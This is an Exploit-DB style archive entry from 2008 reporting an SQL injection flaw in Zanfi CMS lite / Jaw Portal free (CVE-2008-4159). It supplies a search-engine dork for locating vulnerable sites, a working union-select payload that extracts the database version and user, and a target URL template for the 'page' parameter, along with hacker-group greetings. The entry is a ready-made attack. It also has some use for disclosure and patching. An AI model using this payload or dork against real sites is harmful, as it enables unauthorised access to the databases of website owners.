Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection

Author: Cru3l.b0y
type: webapps
platform: php
port: 
date_added: 2008-09-09  
date_updated: 2016-12-21  
verified: 1  
codes: OSVDB-48619;CVE-2008-4159;OSVDB-48618  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6423.txt  

        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +    Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability    +
        +                                                                    +
        +                   Discovered by Cru3l.b0y                          +
        +                                                                    +
        +                     WwW.DeltaHacking.Net                           +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



AUTHOR : Cru3l.b0y
DATE   : 10 sep 2008
SITE   : WwW.DeltaHacking.Net


#####################################################
APPLICATION : Zanfi CMS lite / Jaw Portal free
DOWNLOAD    : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar
VENDOR      : http://www.zanfi.nl/
Dork        : Powered by: Zanfi Solutions
#####################################################


[+] SQL     : DBpAGE&pageid=-1'+union+select+version(),user()/*
[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL]




################################################################
# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net #
################################################################


WebSite: WwW.DeltaHacking.Net  &  WwW.w3bsecurity.iR

Contact: Cru3l.b0y[at]gmail.com

# milw0rm.com [2008-09-10]